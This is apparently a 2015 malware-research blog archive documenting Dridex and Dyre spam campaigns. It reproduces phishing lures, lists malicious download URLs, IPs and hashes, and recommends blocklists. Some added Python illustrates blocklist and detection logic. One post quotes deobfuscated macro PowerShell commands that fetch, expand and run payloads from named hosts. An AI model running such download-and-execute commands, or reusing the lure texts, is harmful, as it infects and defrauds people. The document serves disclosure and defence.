Friday, 13 March 2015
Malware spam: "Invoice (13\03\2015) for payment to COMPANY NAME"
There is a series of malware spams in progress in the following format:
Invoice (13\03\2015) for payment to JUPITER PRIMADONA GROWTH TRUST
Invoice (13\03\2015) for payment to CARD FACTORY PLC
Invoice (13\03\2015) for payment to CELTIC
Invoice (13\03\2015) for payment to MIRADA PLC
Note the use of the backslash in the date. There is an attachment in the format 1234XYZ.doc, of which I have seen three different variants (although one of those was zero length): one was used in this spam run yesterday, and a new one with zero detections contains this malicious macro, which downloads another component from:
http://95.163.121.186/api/gbb1.exe
This is saved as %TEMP%\GHjkdfg.exe. Incidentally, this server is wide open and is full of data and binaries relating to the Dridex campaign. Unsurprisingly, it is hosted on a Digital Networks CJSC aka DINETHOSTING IP address. This binary has a detection rate of 3/53, and the Malwr report shows it phoning home to 95.163.121.33, which is in the same network neighbourhood.
The binary also drops a malicious Dridex DLL with a detection rate of 5/56. This is the same DLL as used in this spam run earlier today.
Recommended blocklist:
95.163.121.0/24
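The recommended blocklists on this page mix single addresses with whole /24s once several phone-home hosts turn up in the same neighbourhood (95.163.121.33 and 95.163.121.186 above, 95.163.121.200 in later posts). As an added example, not code from the original post, the Python below checks whether observed addresses are already covered by a blocklist, suggests a range once a neighbourhood repeats, and collapses entries that a listed range already covers. The sample addresses are the ones quoted in the posts; the /24 prefix and the two-hit threshold are assumptions, not the blog's rule.

```python
import ipaddress
from collections import defaultdict

# Constructed sample: phone-home and download addresses quoted in the posts on this page.
OBSERVED = ["95.163.121.186", "95.163.121.33", "95.163.121.200", "62.76.179.44"]

# The recommended blocklist from the post above, as written.
BLOCKLIST = ["95.163.121.0/24"]


def covered_by(ip, blocklist):
    """Return the blocklist entry that contains ip, or None if nothing blocks it."""
    addr = ipaddress.ip_address(ip)
    for entry in blocklist:
        if addr in ipaddress.ip_network(entry, strict=False):
            return entry
    return None


def uncovered(observed, blocklist):
    """Observed addresses the current blocklist would still let through."""
    return [ip for ip in observed if covered_by(ip, blocklist) is None]


def suggest_networks(observed, prefix=24, min_hits=2):
    """Networks of the given prefix length in which at least min_hits distinct
    observed addresses fall; candidates for blocking as a range rather than
    host by host. Prefix and threshold are assumptions, not the blog's rule."""
    buckets = defaultdict(set)
    for ip in observed:
        net = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
        buckets[net].add(ip)
    return sorted(str(net) for net, hits in buckets.items() if len(hits) >= min_hits)


def consolidate(entries):
    """Collapse a mixed list of hosts and CIDRs, dropping any host that a listed
    range already contains. Hosts come back without a /32 suffix."""
    nets = [ipaddress.ip_network(e, strict=False) for e in entries]
    out = []
    for net in ipaddress.collapse_addresses(nets):
        out.append(str(net.network_address) if net.prefixlen == 32 else str(net))
    return out


if __name__ == "__main__":
    print("not yet blocked:", uncovered(OBSERVED, BLOCKLIST))
    print("ranges to consider:", suggest_networks(OBSERVED))
    print("consolidated:", consolidate(BLOCKLIST + OBSERVED))
```

Run as a script it reports 62.76.179.44 as the only address the /24 does not cover, names 95.163.121.0/24 as the range worth blocking, and leaves a two-entry list once the three 95.163.121.x hosts are folded into it.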
Malware spam: "pentafoods.com" / "Invoice: 2262004"
This fake Penta Foods spam run is another variant of this and it comes with a malicious attachment. Penta Foods are not sending this email, instead it is a simple forgery.
From: cc18923@pentafoods.com
Date: 13 March 2015 at 07:50
Subject: Invoice: 2262004
Please find attached invoice : 2262004
Any queries please contact us.
--
Automated mail message produced by DbMail.
Registered to Penta Foods, License MBA2009357.
Attached is a Word document R-1179776.doc which actually comes in two versions, both with zero detection rates, each containing one of two malicious macros [1] [2] which then download a component from the following locations:
http://accalamh.aspone.cz/js/bin.exe
http://awbrs.com.au/js/bin.exe
This is saved as %TEMP%\fJChjfgD675eDTU.exe and has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] show a phone-home attempt to:
62.76.179.44 (Clodo-Cloud / IT House, Russia)
My sources also indicate that it phones home to:
212.69.172.187 (Webagentur, Austria)
78.129.153.12 (iomart / RapidSwitch, UK)
According to this Malwr report it also drops a DLL with a detection rate of just 2/57 which is probably Dridex.
Recommended blocklist:
62.76.179.44
212.69.172.187
78.129.153.12
Thursday, 12 March 2015
Malware spam: "Invoice [1234XYZ] for payment to COMPANY NAME"
These rather terse emails appear to refer to various companies, and all come with a malicious attachment:
From: Erasmo Small
Date: 12 March 2015 at 09:40
Subject: Invoice [3479XZM] for payment to INCOME & GROWTH VCT PLC(THE)
From: Eli Ramirez
Date: 12 March 2015 at 08:37
Subject: Invoice [4053FJK] for payment to RANDGOLD RESOURCES
From: Richard Baxter
Date: 12 March 2015 at 08:37
Subject: Invoice [3020JQM] for payment to TARSUS GROUP PLC
From: Megan Dennis
Date: 12 March 2015 at 09:36
Subject: Invoice [4706CEZ] for payment to SHANKS GROUP
The attachment is a Word document with a name that matches the reference in the subject. So far, I have seen two different versions of this with low detection rates [1] [2] which contain these malicious macros [1] [2] [pastebin]. The macros contain some quite entertaining obfuscation but, when deobfuscated, try to download an additional component from the following locations:
https://92.63.88.102/api/gb1.exe
https://85.143.166.124/api/gb1.exe
Note the use of HTTPS. Those two IP addresses belong to:
92.63.88.102 (MWTV, Latvia)
85.143.166.124 (Pirix, Russia)
Both are well-known hosts for this sort of rubbish. According to the Malwr report this attempts to phone home to:
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
Digital Networks is also a sea of crap. It also drops a Dridex DLL with a detection rate of 9/57.
Recommended blocklist:
95.163.121.0/24
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
85.143.166.0/24
Wednesday, 11 March 2015
Malware spam: "Voicemail Message (07813297716) From:07813297716"
When was the last time someone sent you a voice mail message by email? Never? There are no surprises to find that this spam email message has a malicious attachment.
From: Voicemail admin@victimdomain
Date: 11/03/2015 11:48
Subject: Voicemail Message (07813297716) From:07813297716
IP Office Voicemail redirected message
Attachment: MSG00311.WAV.ZIP
The attachment is a ZIP file containing a malicious EXE file called MSG00311.WAV.exe which has a VirusTotal detection rate of 5/57. According to the Malwr report, it pulls down another executable and some config files from:
http://wqg64j0ei.homepage.t-online.de/data/log.exe
http://cosmeticvet.su/conlib.php
This behaviour is very much like a Dridex downloader, a campaign that has mostly been using malicious macros rather than EXE-in-ZIP attacks.
The executable it drops has a detection rate of 2/54 and these Malwr reports [1] [2] show a further component download from:
http://muscleshop15.ru/js/jre.exe
http://test1.thienduongweb.com/js/jre.exe
This component has a detection rate of 5/57. According to the Malwr report for that component, it drops (among other things) a DLL with a detection rate of 4/57, which is the same Dridex binary we've been seeing all day.
Piecing together the IP addresses found in those reports combined with some information from one of my intelligence feeds, we can see that the following IPs are involved in this activity:
31.41.45.211 (Relink Ltd, Russia)
62.213.67.115 (Caravan Telecom, Russia)
80.150.6.138 (Deutsche Telekom, Germany)
42.117.1.88 (FPT Telecom Company, Vietnam)
188.225.77.242 (TimeWeb Co. Ltd., Russia)
212.224.113.144 (First Colo GmbH, Germany)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud, Russia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
185.25.150.33 (NetDC.pl, Poland)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)
Recommended blocklist:
31.41.45.211
62.213.67.115
80.150.6.138
42.117.1.88
188.225.77.242
212.224.113.144
37.59.50.19
62.76.179.44
95.163.121.0/24
185.25.150.3
104.232.32.119
188.120.243.159
Labels: DINETHOSTING, Dridex, EXE-in-ZIP, France, Malware, OVH, Poland, Russia, Spam, TheFirst-RU, Viruses, Voice Mail
Malware spam: Message from "RNP0026735991E2" / "inv.09.03"
This pair of spam emails are closely related and have a malicious attachment:
From: admin.scanner@victimdomain
Date: 11 March 2015 at 08:49
Subject: Message from "RNP0026735991E2"
This E-mail was sent from "RNP0026735991E2" (MP C305).
Scan Date: 11.03.2015 08:57:25 (+0100)
Queries to: admin.scanner@victimdomain
Attachment: 201503071457.xls
----------
From: Jora Service [jora.service@yahoo.com]
Date: 11 March 2015 at 09:27
Subject: inv.09.03
Attachment: INV 86-09.03.2015.xls
Neither XLS attachment is currently detected by AV vendors [1] [2] and they contain two related but slightly different macros [1] [2] which download a component from the following locations:
http://koschudu.homepage.t-online.de/js/bin.exe
http://03404eb.netsolhost.com/js/bin.exe
The file is then saved as %TEMP%\fJChjfgD675eDTU.exe which has a VirusTotal detection rate of 3/57. According to this Malwr report, it attempts to connect to the following IPs:
188.225.77.216 (TimeWeb Co. Ltd, Russia)
42.117.1.88 (FPT Telecom Company, Vietnam)
31.41.45.211 (Relink Ltd, Russia)
87.236.215.103 (OneGbits, Lithuania)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)
It also drops a couple more malicious binaries with the following MD5s:
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]
53ba28120a193e53fa09b057cc1cbfa2 [VT 4/57]
Recommended blocklist:
188.225.77.216
42.117.1.88
31.41.45.211
87.236.215.103
104.232.32.119
188.120.243.159
Malware spam: BACS "Remittance Advice" / HMRC "Your Tax rebate"
From: Long Fletcher
Date: 11 March 2015 at 09:44
Subject: Remittance Advice
Good Morning,
Please find attached the BACS Remittance Advice for payment made by RENEW HLDGS.
Please note this may show on your account as a payment reference of FPALSDB.
Kind Regards
Long Fletcher
Finance Coordinator
Attachment: LSDB.xls
----------
From: Vaughn Baker
Date: 11 March 2015 at 09:27
Subject: Your Remittance Advice [FPABHKZCNZ]
Good Morning,
Please find attached the BACS Remittance Advice for payment made by JD SPORTS FASHION PLC.
Please note this may show on your account as a payment reference of FPABHKZCNZ.
Kind Regards
Vaughn Baker
Senior Accountant
----------
From: HMRC
Date: 11 March 2015 at 10:04
Subject: Your Tax rebate
Dear [redacted],
After the last yearly computations of your financial functioning we have defined that you have the right to obtain a tax rebate of 934.80. Please confirm the tax rebate claim and permit us have 6-9 days so that we execute it. A rebate can be postponed for a variety of reasons. For instance confirming unfounded data or applying not in time.
To access the form for your tax rebate, view the report attached. Document Reference: (196XQBK).
Regards, HM Revenue Service. We apologize for the inconvenience.
The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
© 2014, all rights reserved
Sample attachment names:
HMRC: 196XQBK.xls, 89WDZ.xls
BACS: LSDB.xls, Rem_8392TN.xml (note that this is actually an Excel document, not an XML file)
All of these documents have low detection rates [1] [2] [3] [4] and contain these very similar malicious macros (containing sandbox detection algorithms) [1] [2] [3] [4] which, when decrypted, attempt to run the following PowerShell commands:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.39/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://93.170.123.36/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.190/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.177/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
These are probably compromised hosts, for the record they are:
193.26.217.39 (Servachok Ltd, Russia)
93.170.123.36 (PE Gornostay Mikhailo Ivanovich, Ukraine)
85.143.166.190 (Pirix, Russia)
46.30.42.177 (EuroByte / Webazilla, Russia)
These download a CAB file, and then expand and execute it. This EXE has a detection rate of 4/57 and automated analysis tools [1] [2] show attempted traffic to:
95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
188.120.226.6 (TheFirst.RU, Russia)
188.165.5.194 (OVH, France)
According to this Malwr report it drops two further malicious files with the following MD5s:
c6cdf73eb5d11ac545f291bc668fd7fe
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]
Recommended blocklist:
95.163.121.0/24
188.120.226.6
188.165.5.194
193.26.217.39
93.170.123.36
85.143.166.190
46.30.42.177
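The macro-launched command line quoted above (an Office process spawning PowerShell to download into %TEMP%, expand the CAB, then start the EXE) has a very recognisable shape in process-creation telemetry, and the same download-to-%TEMP%-and-run pattern appears in most of the other posts on this page. As an added example, not code from the original post, the Python below scores constructed process-creation records against that shape. The record format, the parent-process check, the scoring threshold and the download host (a labelled placeholder) are assumptions.

```python
import re

# Constructed sample process-creation records: parent image and command line.
# The first command line reproduces the shape quoted in the post; the download
# host is a labelled placeholder, not one of the addresses on this page.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\Office15\EXCEL.EXE",
     "cmdline": r"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://PLACEHOLDER-HOST/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;"},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"PowerShell.exe -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "cmdline": r"cmd /c PowerShell.exe (New-Object Net.WebClient).DownloadFile('http://PLACEHOLDER-HOST/x.exe','%TEMP%\a.exe'); start %TEMP%\a.exe"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"expand C:\Windows\Temp\update.cab C:\Windows\Temp\update.exe"},
]

# Office applications that have no business spawning PowerShell on most desktops.
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")

# Each indicator is one stage of the chain quoted in the post.
INDICATORS = {
    "webclient_download": re.compile(r"Net\.WebClient\)\.DownloadFile\(", re.I),
    "writes_to_temp": re.compile(r"%TEMP%\\[^'\"\s]+", re.I),
    "expands_cab": re.compile(r"\bexpand\s+%TEMP%\\\S+\.cab\b", re.I),
    "starts_dropped_exe": re.compile(r"\bstart\s+%TEMP%\\\S+\.exe", re.I),
}


def classify(event):
    """Return (score, matched indicator names) for one process-creation record."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS and "powershell" in event["cmdline"].lower():
        hits.append("office_spawns_powershell")
    return len(hits), hits


def suspicious(events, threshold=3):
    """Records whose score reaches the (assumed) alerting threshold."""
    return [e for e in events if classify(e)[0] >= threshold]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        score, hits = classify(event)
        print(score, event["parent"].rsplit("\\", 1)[-1], hits)
```

The two Office-spawned downloaders score 5 and 4 and are reported; the backup script and the legitimate expand of a CAB outside %TEMP% score 0. Requiring several stages rather than matching on "PowerShell" alone is what keeps the administrative script out of the alert.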
Friday, 6 March 2015
Fake job offer: jobinituk.com / jobsinits.com / workincroatia.com
This spammed out "job offer" is actually an attempt to recruit people into criminal money laundering.
Date: 6 March 2015 at 21:00
Subject: Hello
Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.
Our firm specializes in advertisment services realizing unique products of creative advertising and branding strategies
and solutions to develop a distinctive brand value.
We cooperate with different countries and currently we have many clients in the USA and the EU.
Due to this fact, we need to increase the number of our destination representatives' regular staff.
In their duties will be included the document and payment control of our clients.
Part-time employment is currently important.
We offer a wage from 3100 GBP per month.
If you are interested in our offer, mail to us your answer on andonis@jobinituk.com and
we will send you an extensive information as soon as possible.
Respectively submitted
Personnel department
There are four related domains:
jobinituk.com
jobsinits.com
workincroatia.com
sati-haus.net
If you receive a job offer soliciting replies to one of these domains, then the job offer is bogus. If you were to accept it, you could well be liable to repay back the money you helped launder, or even face arrest or jail time.
UPDATE: There is a second version of the spam circulating:
Date: 9 March 2015 at 15:23
Subject: Offer
If you have
- excellent administrative skills
- knowledge of Microsoft Office
- a keen eye for details
If you
- present yourself well
- can understand and execute instructions
If you are
- a team player with the ability to work independently
- organized
- reliable and punctual person
- determined to work hard and succeed
Then We need you in Our Advertising Company!
Please email us for details of the job: Benito@jobinituk.com
Labels: Job Offer Scams, Spam
Malware spam: "Mick George Invoice 395687" / "Mick George Invoicing [mginv@mickgeorge.co.uk]"
This malformed spam is meant to have a malicious attachment:
From: Mick George Invoicing [mginv@mickgeorge.co.uk]
Date: 6 March 2015 at 09:29
Subject: Mick George Invoice 395687
Please find attached a copy of your invoice 395687.
If you have any queries regarding the invoice, please do not hesitate to co=
ntact us by emailing mginv@mickgeorge.co.uk<mailto:mginv@mickegeorge.co.uk>=
or calling our finance department on 01480 499125.
Regards
Finance Team
MICK GEORGE[http://mickgeorgeskips.co.uk/wp-content/uploads/2014/08/image00=
1.jpg] (r)
T: 01480 499125
F: 01480 498077
www.mickgeorge.co.uk<http://www.mickgeorge.co.uk/>
Lancaster House, Meadow Lane, St Ives, Cambs, PE27 4YQ [http://mickgeorges=
kips.co.uk/wp-content/uploads/2014/08/image003.jpg] <https://plus.google.co=
m/109160871896788819541/posts> [http://mickgeorgeskips.co.uk/wp-content/=
uploads/2014/08/image004.jpg] <https://twitter.com/mickgeorgeltd>
Specialists in Earthworks * Aggregates * Skip Hire * Contaminated Land Serv=
ices & Remediation * Demolition * Contracting
Waste Management & Recycling * Landfill & Tipping Facilities * Asbestos Rem=
oval * Ready Mix Concrete & Floor Screeds
[Concrete signature]<http://mickgeorgeskips.co.uk/wp-content/uploads/2014/0=
8/Concrete-signature.jpg>
Disclaimer
This email and any attachments are intended only for the use of the individ=
ual or entity to which it is directed and may contain information that is p=
rivileged, confidential and exempt from disclosure under applicable law.
If you have received this email and you are not the intended recipient or t=
he employee or agent responsible for delivering this email to the intended =
recipient, please inform Mick George on +44 (0)1480 498099 and then delete =
the email from your system. If you are not a named addressee you must not u=
se, disclose, disseminate, distribute, copy, print or reply to this email.
Although Mick George Ltd routinely screens for viruses, addressees should s=
can this email and any attachments for viruses. Mick George Ltd makes no re=
presentation or warranty as to the absence of viruses in this email or any =
attachments. Please note for the protection of our clients and business, we=
may monitor and read emails sent to and from our server(s).
Mick George Ltd
Something has gone wrong with the formatting, it is meant to look like this:
Please find attached a copy of your invoice 395687.
If you have any queries regarding the invoice, please do not hesitate to contact us by emailing mginv@mickgeorge.co.uk or calling our finance department on 01480 499125.
Regards
Finance Team
MICK GEORGE ®
T: 01480 499125
F: 01480 498077
www.mickgeorge.co.uk
Specialists in Earthworks • Aggregates • Skip Hire • Contaminated Land Services & Remediation • Demolition • Contracting
Lancaster House, Meadow Lane, St Ives, Cambs, PE27 4YQ
Waste Management & Recycling • Landfill & Tipping Facilities • Asbestos Removal • Ready Mix Concrete & Floor Screeds
Disclaimer
This email and any attachments are intended only for the use of the individual or entity to which it is directed and may contain information that is privileged, confidential and exempt from disclosure under applicable law.
If you have received this email and you are not the intended recipient or the employee or agent responsible for delivering this email to the intended recipient, please inform Mick George on +44 (0)1480 498099 and then delete the email from your system. If you are not a named addressee you must not use, disclose, disseminate, distribute, copy, print or reply to this email.
Although Mick George Ltd routinely screens for viruses, addressees should scan this email and any attachments for viruses. Mick George Ltd makes no representation or warranty as to the absence of viruses in this email or any attachments. Please note for the protection of our clients and business, we may monitor and read emails sent to and from our server(s).
Mick George Ltd
Registered no. 2417831 (England)
The email looks like a genuine email because it has been copied from a genuine email from this company, but Mick George Skips are not actually sending this out. Instead it is a simple forgery.
What you are meant to have attached is a Word document Invoice395687.DOC which comes in several varieties, but they all contain a malicious macro similar to this which (in this case) downloads a component from http://schlaghaufer.de/js/bin.exe
This malware and the payload it drops is identical to the one found in this fake IRS spam run earlier today.
Malware spam: "Your 2015 Electronic IP Pin!" / "Internal Revenue Service [refund.noreply@irs.gov]"
This fake IRS email comes with a malicious attachment.
From: Internal Revenue Service [refund.noreply@irs.gov]
Date: 6 March 2015 at 08:48
Subject: Your 2015 Electronic IP Pin!
Dear Member
This is to inform you that our system has generated your new secured Electronic PIN to e-file your 2014 tax return.
Please kindly download the microsoft file to securely review it.
Thanks
Internal Revenue Service
915 Second Avenue, MS W180
So far I have only seen a single sample of this with an attachment TaxReport(IP_PIN).doc - although there are usually several different versions. Currently this is undetected by AV vendors. This contains a malicious macro [pastebin] which downloads a component from the following location:
http://chihoiphunumos.ru/js/bin.exe
There are probably other download locations, but the payload will be the same. This is saved as %TEMP%\324235235.exe and has a detection rate of 1/55. Automated analysis tools [1] [2] show attempted connections to:
92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithuania)
According to the Malwr report this executable drops another version of itself [VT 1/56] and a malicious DLL [VT 2/56].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24
104.232.32.119
87.236.215.103
Malware spam: "Your online Gateway.gov.uk Submission"
This fake Government spam leads to malware.
From: Gateway.gov.uk
Date: 6 March 2015 at 11:49
Subject: Your online Gateway.gov.uk Submission
Government Gateway logo
Electronic Submission Gateway
Thank you for your submission for the Government Gateway.
The Government Gateway is the UK's centralized registration service for e-Government services.
To view/download your form to the Government Gateway please visit http://www.gateway.gov.uk/
This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.
gov.uk - the best place to find government services and information - Opens in new window
The best place to find government services and information
The link in the email leads to a download at cubbyusercontent.com and the payload is the same as this NatWest spam run also active today.
Malware spam: "You have received a new secure message from BankLine" / "Bankline [secure.message@business.natwest.com]"
This fake banking spam leads to malware.
From: Bankline [secure.message@business.natwest.com]
Date: 6 March 2015 at 10:36
Subject: You have received a new secure message from BankLine
You have received a secure message.
Your Documents have been uploaded to Cubby cloud storage.
Cubby cloud storage is a cloud data service powered by LogMeIn, Inc.
Read your secure message by following the link bellow:
https://www.cubbyusercontent.com/pl/Business%20Secure%20Message.zip/_90ad04a3965340b195b8be98c6a6ae37
----------------
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 8719.
First time users - will need to register after opening the attachment.
About Email Encryption - https://help.business.natwest.com/support/app/answers/detail/a_id/1671/kw/secure%20message
This downloads a ZIP file from cubbyusercontent.com which contains a malicious executable Business Secure Message.exe which has a VirusTotal detection rate of just 1/57.
Automated analysis tools [1] [2] [3] [4] show attempted connections to the following URLs:
http://all-about-weightloss.org/wp-includes/images/vikun.png
http://bestcoveragefoundation.com/wp-includes/images/vikun.png
http://190.111.9.129:14248/0603no11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
http://190.111.9.129:14249/0603no11/HOME/41/7/4/
It also appears that there is an attempted connection to 212.56.214.203.
Of all of these IPs, 190.111.9.129 (Navega.com, Guatemala) is the most critical to block. It is also characteristic of this malware (Upatre/Dyre) that it connects to checkip.dyndns.org to work out the IP address of the infected machine, so it is worth checking for traffic to this domain.
The Malwr report shows several dropped files, including fyuTTs27.exe which has a VirusTotal detection rate of 4/57.
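The post makes two detection points: the high-port connections to 190.111.9.129 and the checkip.dyndns.org lookup that Upatre/Dyre performs first. On its own the lookup is weak evidence (legitimate software asks the same question), but a host that does the lookup and then talks to a listed address is a much stronger signal. As an added example, not code from the original post, the Python below correlates the two over constructed DNS and connection log lines; the single-line log format and the verdict labels are assumptions, and the indicator addresses are the ones named above.

```python
import re
from collections import defaultdict

# Constructed sample log lines in an assumed "timestamp host kind detail" format
# (not any real product's format). ws-017 shows the full Dyre-like sequence.
SAMPLE_LOGS = """\
2015-03-06T10:41:02Z ws-017 dns checkip.dyndns.org
2015-03-06T10:41:03Z ws-017 conn 190.111.9.129:14248
2015-03-06T10:41:09Z ws-017 conn 190.111.9.129:14249
2015-03-06T10:42:30Z ws-042 dns checkip.dyndns.org
2015-03-06T10:50:00Z ws-088 conn 212.56.214.203:443
2015-03-06T11:02:11Z ws-101 dns www.gateway.gov.uk
""".splitlines()

# Addresses named in the post as C2 / phone-home destinations.
C2_INDICATORS = {"190.111.9.129", "212.56.214.203"}
# External "what is my IP" services the malware is known to query.
IP_LOOKUP_DOMAINS = {"checkip.dyndns.org"}

LINE_RX = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<kind>dns|conn)\s+(?P<detail>\S+)$")


def parse(lines):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in lines:
        m = LINE_RX.match(line)
        if m:
            yield m.groupdict()


def correlate(lines):
    """Per host, gather IP-lookup queries and C2 contacts, then grade the combination."""
    seen = defaultdict(lambda: {"ip_lookup": set(), "c2": set()})
    for rec in parse(lines):
        if rec["kind"] == "dns" and rec["detail"].lower() in IP_LOOKUP_DOMAINS:
            seen[rec["host"]]["ip_lookup"].add(rec["detail"].lower())
        elif rec["kind"] == "conn":
            ip, _, port = rec["detail"].rpartition(":")
            if ip in C2_INDICATORS:
                seen[rec["host"]]["c2"].add((ip, int(port)))
    verdicts = {}
    for host, ev in seen.items():
        if ev["ip_lookup"] and ev["c2"]:
            verdicts[host] = "likely_infected"   # both halves of the Dyre pattern
        elif ev["c2"]:
            verdicts[host] = "c2_contact"        # listed address alone: investigate
        else:
            verdicts[host] = "ip_lookup_only"    # weak on its own, keep for context
    return verdicts


if __name__ == "__main__":
    for host, verdict in sorted(correlate(SAMPLE_LOGS).items()):
        print(host, verdict)
```

Hosts that never touch either indicator (ws-101) do not appear in the output at all, which keeps the result to the hosts worth a look.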
Thursday, 5 March 2015
Malware spam: "Credit Control [cc@pentafoods.com]"/ "Penta invoice I0026098"
This spam email does not come from Penta Foods, instead it is a simple forgery with a malicious attachment.
From: Credit Control [cc@pentafoods.com]
Date: 5 March 2015 at 11:10
Subject: Penta invoice I0026098
Please find attached your invoice I0026098
Regards,
Finance Team
Attached is a document I0026098.doc which comes in at least two versions with low detection rates [1] [2] which contain some macros [1] [2] that attempt to download a component from the following locations:
http://maloja.se/js/bin.exe
http://campusnut.com/js/bin.exe
This is the same payload as used in this earlier spam run. It currently has a VirusTotal detection rate of 12/56.
Malware spam: "Bobby Drell [rob@abbottpainting.com]" / "Brochure2.doc"
This spam does not come from Bobby Drell or Abbott Painting, instead it is a simple forgery with a malicious attachment.
From: Bobby Drell [rob@abbottpainting.com]
Date: 5 March 2015 at 10:27
Subject: Brochure2.doc
Please change the year to 2015.
Please confirm receipt
Thanks
Bobby Drell
Attached is a file Brochure2.doc which has a low detection rate and contains this malicious macro [pastebin] which downloads a component from the following location:
http://data.gmsllp.com/js/bin.exe
This is saved as %TEMP%\324235235.exe. Note that there may be different versions of this document that download files from different locations, but the payload should be identical. In this case the executable has a detection rate of 4/57.
Automated analysis tools [1] [2] show it phoning home to the following IPs:
92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks aka DINETHOSTING, Russia)
Usually this will drop a malicious Dridex DLL, although I was not able to obtain a sample.
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24
Wednesday, 4 March 2015
"Remittance advice" spam has a mystery XML attachment
From: Trudy Trevino
Date: 4 March 2015 at 09:29
Subject: Remittance advice [Rem_0559ZX.xml]
Good morning
You can find remittance advice [Rem_0559ZX.xml] in the attachment
Kind Regards
Trudy Trevino
ROSNEFT OJSC
Other example fake senders are:
Georgette Whitfield (DELTEX MEDICAL GROUP)
Jasmine Hansen (ACER INC)
Jodi Cooper (JOHNSON SERVICE GROUP PLC)
Rebekah Dodson (VICTREX)
Edmund Molina (600 GROUP)
Callie Brewer (BIOQUELL)
Harriett Ferguson (BRISTOL & WEST PLC)
Gabrielle Alvarado (JPMORGAN US SMALLER CO INV TST PLC)
The name of the XML file in the attachment (and also the body text and subject) varies but is always in the format Rem_1234AB.xml. So far I have seen three different versions (clicking the MD5 leads to a Pastebin with the XML attachment):
- MD5 B2E594BDE90A1C998F3A7D892BAC925B - VT 0/57
- MD5 77739AB6C20E9DFBEFFA3E2E6960E156 - VT 0/57
- MD5 877E6EC17F307C319E3084D1EDFC40A4 - VT 0/57
There's probably little reason to accept XML documents by email. Blocking these at your email gateway might be a good idea.
UPDATE 1
An analysis from another party indicates the following download locations:
http://92.63.87.12:8080/azvxjdfr31k/abs5ajsu.exe
http://178.32.184.11:8080/azvxjdfr31k/abs5ajsu.exe
http://46.30.42.90:8080/azvxjdfr31k/abs5ajsu.exe
The following are the servers the malware phones home to, I recommend blocking them:
62.76.176.203
46.30.42.171
74.208.68.243
37.139.47.111
More analysis to follow.
Malware spam: "John Donald [john@kingfishermanagement.uk.com]" / "Document1"
This rather terse email comes with a malicious attachment:
From: John Donald [john@kingfishermanagement.uk.com]
Date: 4 March 2015 at 09:09
Subject: Document1
There is no body text, but there is an attachment Document1.doc which is not currently detected by AV vendors; in turn it contains this malicious macro [pastebin] which downloads another component from the following location:
http://retro-moto.cba.pl/js/bin.exe
Note that there may be other different versions of this document with different download locations, but it should be an identical binary that is downloaded. This file is saved as %TEMP%\GHjkdjfgjkGKJ.exe and has a VirusTotal detection rate of 2/57.
Automated analysis tools [1] [2] show attempted network traffic to the following IPs:
92.63.87.13 (MWTV, Latvia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithuania)
108.61.198.33 (Gameservers.com / Choopa LLC, Netherlands)
According to the Malwr report it also drops another version of itself with a detection rate of just 1/57 plus a DLL with a detection rate of 7/56.
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
104.232.32.119
